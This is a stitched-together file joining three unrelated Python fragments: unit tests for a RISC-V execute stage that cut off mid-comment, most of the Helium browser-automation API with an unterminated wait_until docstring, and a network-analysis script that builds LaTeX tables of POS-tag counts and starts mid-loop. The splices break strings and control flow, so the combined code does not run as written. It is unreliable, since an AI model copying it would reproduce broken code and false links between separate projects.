res = ex.alu(opcode=0b01100, rs1=1, rs2=7, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000080
res = ex.alu(opcode=0b01100, rs1=1, rs2=31, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x80000000
res = ex.alu(opcode=0b01100, rs1=0xffffffff, rs2=7, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0xffffff80
res = ex.alu(opcode=0b01100, rs1=0x21212121, rs2=14, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x48484000
# SLT
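# SLT compares rs1 and rs2 as signed 32-bit values; SLTU (below) compares them as unsigned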
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=1, imm=0, rs2=1, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=3, imm=0, rs2=7, pc=0, f3=0b010, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0, pc=0, f3=0b010, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=0xfffff800, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0xfffff800, pc=0, f3=0b010, f7=0)
assert res == 0
# SLTU
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=1, imm=0, rs2=1, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=3, imm=0, rs2=7, pc=0, f3=0b011, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=7, imm=0, rs2=3, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0xfffff800, pc=0, f3=0b011, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0xfffff800, pc=0, f3=0b011, f7=0)
assert res == 1
# XOR
res = ex.alu(opcode=0b01100, rs1=0x00ff0f00, rs2=0xffffff0f, imm=0, pc=0, f3=0b100, f7=0)
assert res == 0xff00f00f
res = ex.alu(opcode=0b01100, rs1=0x00ff08ff, rs2=0x0000070f, imm=0, pc=0, f3=0b100, f7=0)
assert res == 0x00ff0ff0
# SRL
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=0, pc=0, f3=0b101, f7=0)
assert res == 0x00000001
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=1, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=7, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=31, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0xffffffff, imm=0, rs2=7, pc=0, f3=0b101, f7=0)
assert res == 0x01ffffff
res = ex.alu(opcode=0b01100, rs1=0x21212121, imm=0, rs2=14, pc=0, f3=0b101, f7=0)
assert res == 0x00008484
# SRA
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=0, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x7fffffff
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x3fffffff
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xc0c0c0c0
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=7, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xff030303
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=31, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xffffffff
# OR
res = ex.alu(opcode=0b01100, rs1=0xff00ff00, imm=0, rs2=0xffffff0f, pc=0, f3=0b110, f7=0)
assert res == 0xffffff0f
res = ex.alu(opcode=0b01100, rs1=0x00ff00ff, imm=0, rs2=0x0000070f, pc=0, f3=0b110, f7=0)
assert res == 0x00ff07ff
# AND
res = ex.alu(opcode=0b01100, rs1=0xff00ff00, imm=0, rs2=0xffffff0f, pc=0, f3=0b111, f7=0)
assert res == 0xff00ff00
res = ex.alu(opcode=0b01100, rs1=0x00ff00ff, imm=0, rs2=0x0000070f, pc=0, f3=0b111, f7=0)
assert res == 0x0000000f
def test_branch(self):
ex = EXStage()
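# funct3 encodings exercised below (per the RV32I spec):
# 0 = BEQ, 1 = BNE, 4 = BLT, 5 = BGE, 6 = BLTU, 7 = BGEU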
# BEQ
res = ex.branch(f3=0, rs1=0, rs2=0)
assert res == True
res = ex.branch(f3=0, rs1=1, rs2=1)
assert res == True
res = ex.branch(f3=0, rs1=-1, rs2=-1)
assert res == True
res = ex.branch(f3=0, rs1=0, rs2=1)
assert res == False
res = ex.branch(f3=0, rs1=1, rs2=0)
assert res == False
res = ex.branch(f3=0, rs1=-1, rs2=1)
assert res == False
# BNE
res = ex.branch(f3=1, rs1=0, rs2=0)
assert res == False
res = ex.branch(f3=1, rs1=1, rs2=1)
assert res == False
res = ex.branch(f3=1, rs1=-1, rs2=-1)
assert res == False
res = ex.branch(f3=1, rs1=0, rs2=1)
assert res == True
res = ex.branch(f3=1, rs1=1, rs2=0)
assert res == True
res = ex.branch(f3=1, rs1=-1, rs2=1)
assert res == True
# BLT
res = ex.branch(f3=4, rs1=0, rs2=1)
assert res == True
res = ex.branch(f3=4, rs1=MASK_32&(-1), rs2=1)
assert res == True
res = ex.branch(f3=4, rs1=MASK_32&(-2), rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=4, rs1=1, rs2=0)
assert res == False
res = ex.branch(f3=4, rs1=1, rs2=MASK_32&(-1))
assert res == False
res = ex.branch(f3=4, rs1=MASK_32&(-1), rs2=MASK_32&(-2))
assert res == False
res = ex.branch(f3=4, rs1=1, rs2=MASK_32&(-2))
assert res == False
# BGE
res = ex.branch(f3=5, rs1=0, rs2=0)
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=1)
assert res == True
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=0)
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=MASK_32&(-2))
assert res == True
res = ex.branch(f3=5, rs1=0, rs2=1)
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=1)
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-2), rs2=MASK_32&(-1))
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-2), rs2=1)
assert res == False
# BLTU
res = ex.branch(f3=6, rs1=0x00000000, rs2=0x00000001)
assert res == True
res = ex.branch(f3=6, rs1=0xfffffffe, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=6, rs1=0x00000000, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=6, rs1=0x00000001, rs2=0x00000000)
assert res == False
res = ex.branch(f3=6, rs1=0xffffffff, rs2=0xfffffffe)
assert res == False
res = ex.branch(f3=6, rs1=0xffffffff, rs2=0x00000000)
assert res == False
res = ex.branch(f3=6, rs1=0x80000000, rs2=0x7fffffff)
assert res == False
# BGEU
res = ex.branch(f3=7, rs1=0x00000000, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0x00000001, rs2=0x00000001)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=7, rs1=0x00000001, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0xfffffffe)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0x00000000, rs2=0x00000001)
assert res == False
res = ex.branch(f3=7, rs1=0xfffffffe, rs2=0xffffffff)
assert res == False
res = ex.branch(f3=7, rs1=0x00000000, rs2=0xffffffff)
assert res == False
res = ex.branch(f3=7, rs1=0x7fffffff, rs2=0x80000000)
assert res == False
def test_EXStage(self):
ex = EXStage()
# Test pass throughs
ex.IDEX_i.write('rd', 24,
'we', True,
'wb_sel', 2,
'rs2', 0xdeadbeef,
'mem', 2,
'funct3', 5)
#ex.process()
out = ex.EXMEM_o.read()
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 2
assert out['rs2'] == 0xdeadbeef
assert out['mem'] == 2
assert out['funct3'] == 5
# LUI x24, 0xaffe
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0xaffe<<12,
'pc', 0,
'rd', 24,
'we', True,
'wb_sel', 0,
'opcode', 0b01101)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == False
assert out['alu_res'] == 0xaffe<<12
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 0
# AUIPC x24, 0xaffe
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0xaffe<<12,
'pc', 0x80000000,
'rd', 24,
'we', True,
'wb_sel', 0,
'opcode', 0b00101)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == False
assert out['alu_res'] == 0x8AFFE000
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 0
# JAL x13, 0x2DA89
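# For JAL the ALU result carries the jump target pc + imm:
# 0x80004000 + (0x2DA89 << 1) = 0x80004000 + 0x5B512 = 0x8005F512,
# while pc4 holds the link value pc + 4 = 0x80004004.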
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0x2DA89<<1,
'pc', 0x80004000,
'rd', 13,
'we', True,
'wb_sel', 1,
'opcode', 0b11011)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == True
assert out['alu_res'] == 0x8005F512
assert out['rd'] == 13
assert out['we'] == True
assert out['wb_sel'] == 1
assert out['pc4'] == 0x80004004
# JALR x13, x28, 0x401 (note: reg x28 not explicitly needed;
"""
Helium's API is contained in module ``helium``. It is a simple Python API that
makes specifying web automation cases as simple as describing them to someone
looking over their shoulder at a screen.
The public functions and classes of Helium are listed below. If you wish to use
Helium functions in your Python scripts you can import them from the
``helium`` module::
from helium import *
"""
from collections import namedtuple, OrderedDict
from copy import copy
from helium._impl import APIImpl
from helium._impl.util.html import get_easily_readable_snippet
from helium._impl.util.inspect_ import repr_args
from selenium.webdriver.common.keys import Keys
import helium._impl
def start_chrome(url=None, headless=False, maximize=False, options=None):
"""
:param url: URL to open.
:type url: str
:param headless: Whether to start Chrome in headless mode.
:type headless: bool
:param maximize: Whether to start Chrome window in maximized mode.
:type maximize: bool
:param options: ChromeOptions to use for starting the browser
:type options: :py:class:`selenium.webdriver.ChromeOptions`
Starts an instance of Google Chrome::
start_chrome()
If this doesn't work for you, then it may be that Helium's copy of
ChromeDriver is not compatible with your version of Chrome. To fix this,
place a copy of ChromeDriver on your `PATH`.
You can optionally open a URL::
start_chrome("google.com")
The `headless` switch lets you prevent the browser window from appearing on
your screen::
start_chrome(headless=True)
start_chrome("google.com", headless=True)
For more advanced configuration, use the `options` parameter::
from selenium.webdriver import ChromeOptions
options = ChromeOptions()
options.add_argument('--proxy-server=172.16.17.32:5678')
start_chrome(options=options)
On shutdown of the Python interpreter, Helium cleans up all resources used
for controlling the browser (such as the ChromeDriver process), but does
not close the browser itself. If you want to terminate the browser at the
end of your script, use the following command::
kill_browser()
"""
return _get_api_impl().start_chrome_impl(url, headless, maximize, options)
def start_firefox(url=None, headless=False, options=None):
"""
:param url: URL to open.
:type url: str
:param headless: Whether to start Firefox in headless mode.
:type headless: bool
:param options: FirefoxOptions to use for starting the browser.
:type options: :py:class:`selenium.webdriver.FirefoxOptions`
Starts an instance of Firefox::
start_firefox()
If this doesn't work for you, then it may be that Helium's copy of
geckodriver is not compatible with your version of Firefox. To fix this,
place a copy of geckodriver on your `PATH`.
You can optionally open a URL::
start_firefox("google.com")
The `headless` switch lets you prevent the browser window from appearing on
your screen::
start_firefox(headless=True)
start_firefox("google.com", headless=True)
For more advanced configuration, use the `options` parameter::
from selenium.webdriver import FirefoxOptions
options = FirefoxOptions()
options.add_argument("--width=2560")
options.add_argument("--height=1440")
start_firefox(options=options)
On shutdown of the Python interpreter, Helium cleans up all resources used
for controlling the browser (such as the geckodriver process), but does
not close the browser itself. If you want to terminate the browser at the
end of your script, use the following command::
kill_browser()
"""
return _get_api_impl().start_firefox_impl(url, headless, options)
def go_to(url):
"""
:param url: URL to open.
:type url: str
Opens the specified URL in the current web browser window. For instance::
go_to("google.com")
"""
_get_api_impl().go_to_impl(url)
def set_driver(driver):
"""
Sets the Selenium WebDriver used to execute Helium commands. See also
:py:func:`get_driver`.
"""
_get_api_impl().set_driver_impl(driver)
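# Minimal usage sketch (illustrative; assumes Selenium and a matching driver
# binary are installed):
#
#     from selenium import webdriver
#     driver = webdriver.Chrome()
#     set_driver(driver)
#     go_to("example.com")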
def get_driver():
"""
Returns the Selenium WebDriver currently used by Helium to execute all
commands. Each Helium command such as ``click("Login")`` is translated to a
sequence of Selenium commands that are issued to this driver.
"""
return _get_api_impl().get_driver_impl()
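# Minimal usage sketch: drop down to the raw Selenium API for anything Helium
# does not cover, e.g.:
#
#     get_driver().execute_script("window.scrollTo(0, 0);")
#     print(get_driver().current_url)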
def write(text, into=None):
"""
:param text: The text to be written.
:type text: one of str, unicode
:param into: The element to write into.
:type into: one of str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement`, :py:class:`Alert`
Types the given text into the active window. If parameter 'into' is given,
writes the text into the text field or element identified by that parameter.
Common examples of 'write' are::
write("Hello World!")
write("user12345", into="Username:")
write("Michael", into=Alert("Please enter your name"))
"""
_get_api_impl().write_impl(text, into)
def press(key):
"""
:param key: Key or combination of keys to be pressed.
Presses the given key or key combination. To press a normal letter key such
as 'a' simply call `press` for it::
press('a')
You can also simulate the pressing of upper case characters that way::
press('A')
The special keys you can press are those given by Selenium's class
:py:class:`selenium.webdriver.common.keys.Keys`. Helium makes all those keys
available through its namespace, so you can just use them without having to
refer to :py:class:`selenium.webdriver.common.keys.Keys`. For instance, to
press the Enter key::
press(ENTER)
To press multiple keys at the same time, concatenate them with `+`. For
example, to press Control + a, call::
press(CONTROL + 'a')
"""
_get_api_impl().press_impl(key)
NULL = Keys.NULL
CANCEL = Keys.CANCEL
HELP = Keys.HELP
BACK_SPACE = Keys.BACK_SPACE
TAB = Keys.TAB
CLEAR = Keys.CLEAR
RETURN = Keys.RETURN
ENTER = Keys.ENTER
SHIFT = Keys.SHIFT
LEFT_SHIFT = Keys.LEFT_SHIFT
CONTROL = Keys.CONTROL
LEFT_CONTROL = Keys.LEFT_CONTROL
ALT = Keys.ALT
LEFT_ALT = Keys.LEFT_ALT
PAUSE = Keys.PAUSE
ESCAPE = Keys.ESCAPE
SPACE = Keys.SPACE
PAGE_UP = Keys.PAGE_UP
PAGE_DOWN = Keys.PAGE_DOWN
END = Keys.END
HOME = Keys.HOME
LEFT = Keys.LEFT
ARROW_LEFT = Keys.ARROW_LEFT
UP = Keys.UP
ARROW_UP = Keys.ARROW_UP
RIGHT = Keys.RIGHT
ARROW_RIGHT = Keys.ARROW_RIGHT
DOWN = Keys.DOWN
ARROW_DOWN = Keys.ARROW_DOWN
INSERT = Keys.INSERT
DELETE = Keys.DELETE
SEMICOLON = Keys.SEMICOLON
EQUALS = Keys.EQUALS
NUMPAD0 = Keys.NUMPAD0
NUMPAD1 = Keys.NUMPAD1
NUMPAD2 = Keys.NUMPAD2
NUMPAD3 = Keys.NUMPAD3
NUMPAD4 = Keys.NUMPAD4
NUMPAD5 = Keys.NUMPAD5
NUMPAD6 = Keys.NUMPAD6
NUMPAD7 = Keys.NUMPAD7
NUMPAD8 = Keys.NUMPAD8
NUMPAD9 = Keys.NUMPAD9
MULTIPLY = Keys.MULTIPLY
ADD = Keys.ADD
SEPARATOR = Keys.SEPARATOR
SUBTRACT = Keys.SUBTRACT
DECIMAL = Keys.DECIMAL
DIVIDE = Keys.DIVIDE
F1 = Keys.F1
F2 = Keys.F2
F3 = Keys.F3
F4 = Keys.F4
F5 = Keys.F5
F6 = Keys.F6
F7 = Keys.F7
F8 = Keys.F8
F9 = Keys.F9
F10 = Keys.F10
F11 = Keys.F11
F12 = Keys.F12
META = Keys.META
COMMAND = Keys.COMMAND
def click(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Clicks on the given element or point. Common examples are::
click("Sign in")
click(Button("OK"))
click(Point(200, 300))
click(ComboBox("File type").top_left + (50, 0))
"""
_get_api_impl().click_impl(element)
def doubleclick(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Performs a double-click on the given element or point. For example::
doubleclick("Double click here")
doubleclick(Image("Directories"))
doubleclick(Point(200, 300))
doubleclick(TextField("Username").top_left - (0, 20))
"""
_get_api_impl().doubleclick_impl(element)
def drag(element, to):
"""
:param element: The element or point to drag.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
:param to: The element or point to drag to.
:type to: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Drags the given element or point to the given location. For example::
drag("Drag me!", to="Drop here.")
The dragging is performed by hovering the mouse cursor over ``element``,
pressing and holding the left mouse button, moving the mouse cursor over
``to``, and then releasing the left mouse button again.
This function is exclusively used for dragging elements inside one web page.
If you wish to drag a file from the hard disk onto the browser window (e.g.
to initiate a file upload), use function :py:func:`drag_file`.
"""
_get_api_impl().drag_impl(element, to)
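# The two helpers below are the low-level halves of a drag gesture:
# press_mouse_on(element) presses and holds the left mouse button over the
# given element or point, and release_mouse_over(element) releases it there.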
def press_mouse_on(element):
_get_api_impl().press_mouse_on_impl(element)
def release_mouse_over(element):
_get_api_impl().release_mouse_over_impl(element)
def find_all(predicate):
"""
Lets you find all occurrences of the given GUI element predicate. For
instance, the following statement returns a list of all buttons with label
"Open"::
find_all(Button("Open"))
Other examples are::
find_all(Window())
find_all(TextField("Address line 1"))
The function returns a list of elements of the same type as the passed-in
parameter. For instance, ``find_all(Button(...))`` yields a list whose
elements are of type :py:class:`Button`.
In a typical usage scenario, you want to pick out one of the occurrences
returned by :py:func:`find_all`. In such cases, :py:func:`list.sort` can
be very useful. For example, to find the leftmost "Open" button, you can
write::
buttons = find_all(Button("Open"))
leftmost_button = sorted(buttons, key=lambda button: button.x)[0]
"""
return _get_api_impl().find_all_impl(predicate)
def scroll_down(num_pixels=100):
"""
Scrolls down the page the given number of pixels.
"""
_get_api_impl().scroll_down_impl(num_pixels)
def scroll_up(num_pixels=100):
"""
Scrolls the page up the given number of pixels.
"""
_get_api_impl().scroll_up_impl(num_pixels)
def scroll_right(num_pixels=100):
"""
Scrolls the page to the right the given number of pixels.
"""
_get_api_impl().scroll_right_impl(num_pixels)
def scroll_left(num_pixels=100):
"""
Scrolls the page to the left the given number of pixels.
"""
_get_api_impl().scroll_left_impl(num_pixels)
def hover(element):
"""
:param element: The element or point to hover.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Hovers the mouse cursor over the given element or point. For example::
hover("File size")
hover(Button("OK"))
hover(Link("Download"))
hover(Point(200, 300))
hover(ComboBox("File type").top_left + (50, 0))
"""
_get_api_impl().hover_impl(element)
def rightclick(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Performs a right click on the given element or point. For example::
rightclick("Something")
rightclick(Point(200, 300))
rightclick(Image("captcha"))
"""
_get_api_impl().rightclick_impl(element)
def select(combo_box, value):
"""
:param combo_box: The combo box whose value should be changed.
:type combo_box: str, unicode or :py:class:`ComboBox`
:param value: The visible value of the combo box to be selected.
Selects a value from a combo box. For example::
select("Language", "English")
select(ComboBox("Language"), "English")
"""
_get_api_impl().select_impl(combo_box, value)
def drag_file(file_path, to):
"""
Simulates the dragging of a file from the computer over the browser window
and dropping it over the given element. This allows you, for example, to attach
files to emails in Gmail::
click("COMPOSE")
write("<EMAIL>", into="To")
write("Email subject", into="Subject")
drag_file(r"C:\\Documents\\notes.txt", to="Drop files here")
"""
_get_api_impl().drag_file_impl(file_path, to)
def attach_file(file_path, to=None):
"""
:param file_path: The path of the file to be attached.
:param to: The file input element to which the file should be attached.
Allows attaching a file to a file input element. For instance::
attach_file("c:/test.txt", to="Please select a file:")
The file input element is identified by its label. If you omit the ``to=``
parameter, then Helium attaches the file to the first file input element it
finds on the page.
"""
_get_api_impl().attach_file_impl(file_path, to=to)
def refresh():
"""
Refreshes the current page. If an alert dialog is open, then Helium first
closes it.
"""
_get_api_impl().refresh_impl()
def wait_until(condition_fn, timeout_secs=10, interval_secs=0.5):
"""
:param condition_fn: A function taking no arguments that represents the \
condition to be waited for.
:param timeout_secs: The timeout, in seconds, after which the condition is \
deemed to have failed.
:param interval_secs: The interval, in seconds, at which the condition \
function is polled to determine whether the wait has succeeded.
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] += val
elif measure[0] == 'i':
total[1] += val
elif measure[0] == 'h':
total[2] += val
adict4[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
adict5[layer][synset] = (total, adict2[layer][synset][0],
(peaks, len(measures)), measures)
# if len(measures) >= 13:
adict6[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
labelsh = ['synset', 'p.', 'i.', 'h', 'peaks']
labels = []
data = []
for layer in adict6:
for entry in adict6[layer]:
labels.append(entry)
data_ = adict6[layer][entry]
data.append([*data_[1], *data_[2]][:-1])
fname_ = TDIR+'posInlineTotal.tex'
caption = 'Counts of evidence of differences related to POS tags in the Erd\\"os sectors in each of the analyzed networks.'
g.tableHelpers.lTable(labels,labelsh,data,caption,fname_,two_decimal=False)
ME=g.tableHelpers.me
ME(fname_[:-4],"\\bf",[(0,i) for i in range(0,5)])
DL=g.tableHelpers.dl
DL(fname_[:-4]+"_",[1],[1,4],[2,4,7,9,10,11])
# ----------------------------------
files=os.listdir(TDIR)
files = [i for i in files if 'wnPOSInline' in i and '_' not in i
and 'Total' not in i and '-' not in i]
adict = {1:OrderedDict(), 2:{}, 3:{}}
for afile in files:
text = open(TDIR+afile,'r').read().replace('\\hline','').split('\\\\')[1:-1]
# t = [i[1:-1] for i in text if ' total' not in i]
t = [i[1:-1] for i in text]
t_ = [i.split(' & ') for i in t]
matrix = [[float(i) for i in j[2:]] for j in t_]
names = [i[0] for i in t_]
layer = 1
for array, name in zip(matrix, names):
if ' total' in name:
layer += 1
continue
if min(array) == 0:
continue
if max(array) < 5:
low_measure = 1
elif max(array) < 10:
low_measure = 2
else:
low_measure = 0
if max(array)/min(array) > 1.5:
difference = 2
elif max(array)/min(array) > 1.1:
difference = 1
else:
difference = 0
array_ = sorted(array)
a = array
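# Classify the ordering of the three sector counts (columns read as p, i, h):
# 'difference' flags how pronounced the spread is (max/min > 1.5 -> strong, later
# marked '*'; > 1.1 -> mild; otherwise the row is recorded as '-'), and
# 'low_measure' marks small absolute counts (max < 5 -> '__', max < 10 -> '_').
# The if-chain below maps each permutation of the values to a code whose first
# letter names the largest column ('p', 'h', 'hp', 'ph', 'ip', 'ih'); rows with
# exact ties fall through and keep the previous value of 'order'.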
if sum([i==j for i,j in zip(array, array_)]) == 3:
order = 'h'
elif sum([i==j for i,j in zip([a[2], a[0], a[1]], array_[::-1])]) == 3:
order = 'hp'
elif sum([i==j for i,j in zip(array, array_[::-1])]) == 3:
order = 'p'
elif sum([i==j for i,j in zip([a[0], a[2], a[1]], array_[::-1])]) == 3:
order = 'ph'
elif sum([i==j for i,j in zip([a[1], a[0], a[2]], array_[::-1])]) == 3:
order = 'ip'
elif sum([i==j for i,j in zip([a[1], a[2], a[0]], array_[::-1])]) == 3:
order = 'ih'
print(array)
print(name, difference, low_measure, order)
if difference == 0:
order = '-'
elif difference == 2:
order += '*'
if low_measure == 2:
order += '_'
elif low_measure == 1:
order += '__'
print(order)
if name in adict[layer]:
adict[layer][name].append(order)
else:
adict[layer][name] = [order]
adict_ = {1:OrderedDict(), 2:{}, 3:{}}
adict2 = {1:OrderedDict(), 2:{}, 3:{}}
adict3 = {1:OrderedDict(), 2:{}, 3:{}}
adict4 = {1:OrderedDict(), 2:{}, 3:{}}
adict5 = {1:OrderedDict(), 2:{}, 3:{}}
adict6 = {1:OrderedDict(), 2:{}, 3:{}}
print('\n\n\n =========================')
for layer in adict:
for synset in adict[layer]:
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] += val
elif measure[0] == 'i':
total[1] += val
elif measure[0] == 'h':
total[2] += val
adict4[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
adict5[layer][synset] = (total, adict2[layer][synset][0],
(peaks, len(measures)), measures)
# if len(measures) >= 13:
adict6[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
labelsh = ['synset', 'p.', 'i.', 'h', 'peaks']
labels = []
data = []
for layer in adict6:
for entry in adict6[layer]:
labels.append(entry)
data_ = adict6[layer][entry]
data.append([*data_[1], *data_[2]][:-1])
fname_ = TDIR+'wnPOSInlineTotal.tex'
caption = 'Counts of evidence of differences related to Wordnet POS tags in the Erd\\"os sectors in each of the analyzed networks.'
g.tableHelpers.lTable(labels,labelsh,data,caption,fname_,two_decimal=False)
ME=g.tableHelpers.me
ME(fname_[:-4],"\\bf",[(0,i) for i in range(0,5)])
DL=g.tableHelpers.dl
DL(fname_[:-4]+"_",[1,-4],[1,4],)
# ----------------------------------
files=os.listdir(TDIR)
files = [i for i in files if 'wnPOSInline2-n-' in i and '_' not in i
and 'Total' not in i and 'tag' in i]
adict = {1:OrderedDict(), 2:{}, 3:{}}
for afile in files:
text = open(TDIR+afile,'r').read().replace('\\hline','').split('\\\\')[1:-1]
# t = [i[1:-1] for i in text if ' total' not in i]
t = [i[1:-1] for i in text]
t_ = [i.split(' & ') for i in t]
matrix = [[float(i) for i in j[2:]] for j in t_]
names = [i[0] for i in t_]
layer = 1
for array, name in zip(matrix, names):
if ' total' in name:
layer += 1
continue
if min(array) == 0:
continue
if max(array) < 5:
low_measure = 1
elif max(array) < 10:
low_measure = 2
else:
low_measure = 0
if max(array)/min(array) > 1.5:
difference = 2
elif max(array)/min(array) > 1.1:
difference = 1
else:
difference = 0
array_ = sorted(array)
a = array
if sum([i==j for i,j in zip(array, array_)]) == 3:
order = 'h'
elif sum([i==j for i,j in zip([a[2], a[0], a[1]], array_[::-1])]) == 3:
order = 'hp'
elif sum([i==j for i,j in zip(array, array_[::-1])]) == 3:
order = 'p'
elif sum([i==j for i,j in zip([a[0], a[2], a[1]], array_[::-1])]) == 3:
order = 'ph'
elif sum([i==j for i,j in zip([a[1], a[0], a[2]], array_[::-1])]) == 3:
order = 'ip'
elif sum([i==j for i,j in zip([a[1], a[2], a[0]], array_[::-1])]) == 3:
order = 'ih'
print(array)
print(name, difference, low_measure, order)
if difference == 0:
order = '-'
elif difference == 2:
order += '*'
if low_measure == 2:
order += '_'
elif low_measure == 1:
order += '__'
print(order)
if name in adict[layer]:
adict[layer][name].append(order)
else:
adict[layer][name] = [order]
adict_ = {1:OrderedDict(), 2:{}, 3:{}}
adict2 = {1:OrderedDict(), 2:{}, 3:{}}
adict3 = {1:OrderedDict(), 2:{}, 3:{}}
